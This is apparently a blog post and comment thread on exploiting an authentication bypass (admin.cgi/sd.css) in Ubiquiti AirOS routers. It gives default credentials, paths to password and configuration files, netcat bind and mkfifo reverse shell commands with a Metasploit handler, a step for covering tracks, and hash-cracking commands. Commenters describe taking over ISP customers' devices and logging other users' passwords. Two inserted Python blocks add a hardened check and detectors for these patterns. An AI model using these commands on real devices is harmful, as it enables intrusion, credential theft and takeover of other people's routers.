[exploit] AirOS 5

Vulnerable: Ubiquiti Networks, Inc. AirOS 5
Ubiquiti Networks, Inc. AirOS 4.0
Ubiquiti Networks, Inc. AirOS 3.6.1

Default:
IP: 192.168.1.20
Username: ubnt
Password: ubnt
first off:
http://www.securityfocus.com/bid/51178/exploit

go to
http://<site>/admin.cgi/sd.css

here’s a menu for uploading/downloading files, etc. 🙂
download /etc/passwd and voilà
(or command execute: cat /etc/passwd)

you can download
/etc/passwd
lib/settings.inc
/tmp/system.cfg
/usr/etc/system.cfg
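The post only shows the effect (appending `/sd.css` to `admin.cgi` yields the admin menu without logging in). The added example below, which is not part of the original post or of AirOS, assumes the usual root cause for this kind of bug: the web server exempts any request whose path ends in a static-asset extension from its login check, while the CGI dispatcher still runs `admin.cgi` and treats the suffix as extra path info. It contrasts that suffix-based rule with a handler-based one, and then runs a detection over constructed Common Log Format lines (the function names, the extension list, the log format and the sample lines are all assumptions, not from the page).

```python
import re
from urllib.parse import unquote, urlsplit

# Extensions a naive server rule might treat as public static content and
# exempt from the login check (assumed root cause; the post only shows the effect).
STATIC_EXTENSIONS = (".css", ".js", ".png", ".gif", ".jpg", ".ico")


def naive_requires_auth(target: str) -> bool:
    """Vulnerable rule: look only at how the URL path ends.
    '/admin.cgi/sd.css' ends in '.css', so it is waved through unauthenticated."""
    path = unquote(urlsplit(target).path).lower()
    return not path.endswith(STATIC_EXTENSIONS)


def hardened_requires_auth(target: str) -> bool:
    """Decide by the program that will handle the request, not by the URL suffix.
    Any '.cgi' segment anywhere in the path means a CGI handler runs (the rest is
    PATH_INFO), so authentication is always required. Only a bare single static
    file is exempt; everything else is denied by default."""
    path = unquote(urlsplit(target).path).lower()
    segments = [s for s in path.split("/") if s]
    if any(seg.endswith(".cgi") for seg in segments):
        return True
    if len(segments) == 1 and segments[0].endswith(STATIC_EXTENSIONS):
        return False
    return True


# Common Log Format: client, ident, user, [timestamp], "METHOD target PROTO", status, size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3})'
)

# A CGI script followed by extra path info that ends in a static extension.
BYPASS_RE = re.compile(r'\.cgi/[^?]*\.(?:css|js|png|gif|jpg|ico)\b', re.IGNORECASE)


def scan_access_log(lines):
    """Return (client, timestamp, decoded target, status) for every request whose
    path shows the CGI-plus-static-suffix shape, after percent-decoding so that
    encoded or upper-cased variants do not slip past the rule."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        target = unquote(m.group("target"))
        if BYPASS_RE.search(target):
            hits.append((m.group("ip"), m.group("ts"), target, m.group("status")))
    return hits


# Constructed sample log lines (not taken from any real device).
SAMPLE_LOG = [
    '10.0.0.2 - - [04/Jan/2012:07:40:01 +0100] "GET /admin.cgi/sd.css HTTP/1.1" 200 5123',
    '10.0.0.2 - - [04/Jan/2012:07:41:15 +0100] "POST /admin.cgi/sd.css HTTP/1.1" 200 402',
    '10.0.0.3 - - [04/Jan/2012:07:42:00 +0100] "GET /login.cgi HTTP/1.1" 200 1834',
    '10.0.0.3 - - [04/Jan/2012:07:42:01 +0100] "GET /sd.css HTTP/1.1" 200 913',
    '10.0.0.2 - - [04/Jan/2012:07:43:30 +0100] "GET /reset.cgi/sd.css HTTP/1.1" 200 0',
    '10.0.0.4 - - [04/Jan/2012:07:44:00 +0100] "GET /ADMIN.CGI/%73d.css HTTP/1.1" 200 5123',
]

if __name__ == "__main__":
    for ip, ts, target, status in scan_access_log(SAMPLE_LOG):
        print(f"{ts} {ip} {status} {target}")
```

Point the scanner at the access log of whatever front-ends the device (or the device's own web server log, if it keeps one); a 200 on a `.cgi/...css` path from an address that never hit `login.cgi` is the signature worth alerting on. The hardened rule is deliberately default-deny: anything that is neither a single static file nor an explicitly authenticated CGI request is treated as needing a login.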

Command lines:
wlanconfig ath0 list scan
iwconfig
ifconfig
netstat -a
uname -a
ps -A
ls -a
or try:
cat /etc/passwd
discover
status-full.cgi
id
env

shells:
/bin/sh
/bin/ash
/bin/clish

————————————
let’s create a shell with Metasploit
————————————
Cmd to execute at sd.css:
nc -l -p 4444 -e /bin/sh -i

- open Metasploit

sudo ./msfconsole
> use multi/handler
exploit(handler) > set payload cmd/unix/bind_netcat
exploit(handler) > set rhost <target>
exploit(handler) > exploit
Started bind handler
Starting the payload handler…
Command shell session 10 opened (10.0.0.2:59681 -> xxx.xxx.xxx.xx:4444) at 2012-01-04 07:48:50 +0100
so, there’s your shell
(don’t forget to open your port 4444 if behind a router.)

or use nc, of course
nc <ip> 4444

on the same page, after you’re done playing around, execute this command:
rm /tmp/.sessions.tdb
I noticed Netcat on AirOS doesn’t support -e
workaround:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc your ISP-IP 4444 >/tmp/f
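The two shell commands above (the netcat bind shell and the mkfifo workaround) have a recognisable shape in a process listing. The following detection is an added example, not part of the original post: it runs three constructed patterns over a constructed `ps`-style listing that contains the exact commands from the post, and reports which PIDs match which pattern (the listing, the pattern names and the function name are assumptions).

```python
import re

# Constructed ps-style output (PID, USER, COMMAND), not captured from a real device.
# PIDs 511 and 530 carry the exact commands the post runs on the device.
SAMPLE_PS = """\
  PID USER       COMMAND
    1 root       init
  402 root       /usr/sbin/httpd -f /etc/httpd.conf
  511 root       nc -l -p 4444 -e /bin/sh -i
  530 root       sh -c rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 203.0.113.7 4444 >/tmp/f
  531 root       cat /tmp/f
  540 root       sleep 60
"""

# Each pattern describes one shape of an interactive shell hung off netcat.
PATTERNS = {
    # nc ... -e /bin/sh : netcat handing its socket to a shell (needs -e support)
    "nc_exec_shell": re.compile(r'\bnc\b.*\s-e\s+\S*sh\b'),
    # mkfifo X ... | sh ... | nc : the FIFO workaround for netcat builds without -e
    "fifo_shell_pipe": re.compile(r'mkfifo\s+\S+.*\|\s*/?bin/\w*sh\b.*\|\s*nc\b'),
    # nc -l : netcat listening for an inbound connection
    "nc_listener": re.compile(r'\bnc\b.*\s-l\b'),
}


def scan_process_list(ps_output: str):
    """Return a list of (pid, pattern_name) for every command line that matches
    one of the shell-over-netcat patterns. The header line is skipped; a command
    can match more than one pattern (a bind shell is also a listener)."""
    findings = []
    for line in ps_output.splitlines()[1:]:
        parts = line.split(None, 2)
        if len(parts) < 3:
            continue
        pid, _user, cmd = parts
        for name, rx in PATTERNS.items():
            if rx.search(cmd):
                findings.append((int(pid), name))
    return findings


if __name__ == "__main__":
    for pid, name in scan_process_list(SAMPLE_PS):
        print(f"PID {pid}: {name}")
```

On a real host, feed it the output of `ps` (on a busybox system `ps` alone prints the columns assumed here) or a periodic process snapshot; any hit on an embedded device that has no business running netcat at all is worth an immediate look, as is the `/tmp/f` FIFO the workaround leaves behind.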

–enjoy

55 thoughts on “[exploit] AirOS 5”

  1. Hi, I know the password which is encrypted in system.cgi, but the user is disabled, how can you enable him? Or any other way how to create a new user with password and login using this account?

  2. Pingback: Vulnerability AirOS

    • I tried some basics, but couldn’t find it.
      You can try it yourself with John The Ripper (if you have linux — install backtrack5)

      ./john --format=des --wordlist= --rules

      my wordlist (a small one) didn’t give any results,
      and I really don’t have the time now to bruteforce it without a dictionary. If you google you can find some sites where you can post this and ask (request) for a collision hash.

  3. Here I leave a trick, follow these STEPS carefully:

    1) Use /tmp/system.cfg download the file
    2) Open system.cfg and open with wordpad or notepad then go where it says:
    users.1.name=ZZZZZZZ
    users.1.password=XXXXXXXX
    users.1.status=enabled

    change the user to: ubnt, and password to : VvpvCwhccFv6Q
    now save
    4) Go TO http://x.x.x.x/reset.cgi/sd.css (this will reset the router)
    5) now connect to IP : 192.168.1.20 login user & pass should be ubnt
    6) Go to ” system ” then configuration management and upload your modified file
    7) now you got all your configuration with ubnt user&pass
    8) enjoy ( WARRANTY MOST OF THE ISP USE FALLBACK IP 192.168.1.20 FOR ALL USERS SO YOU WILL BE UNABLE TO LOGIN ( 5 STEP)). I RECOMMEND TO YOU SCAN 192.168.1.XXX.

  4. can’t do all of that, when opening http:///admin.cgi/sd.css :

    Error 403 – Forbidden
    You have attempted to access the page, which is forbidden for your account
    In a few seconds you will be redirected to the main page. If you are not redirected, then please click the following link: Main

    What is the story with it??

  5. Hi there,
    Is there a way to overwrite login.cgi using this administration utility (sd.css) and upload a modified one that also logs the password at login to a text file? Then read the file using the cat command?
    Thanks!

  6. neusbeer – I try to use HashCat, but I can not understand what hash type do I use?? and what parameters to configure hashcat.
    I try hashtype Gui Win32.
    TNX

  7. Can someone decrypt this password for me?? The guy that installed my AirGrid m5 changed the ubnt/ubnt login to Admin and the password code is

    WwdyOxbH4wBR2
    can someone decrypt it or give me a site or anything ?
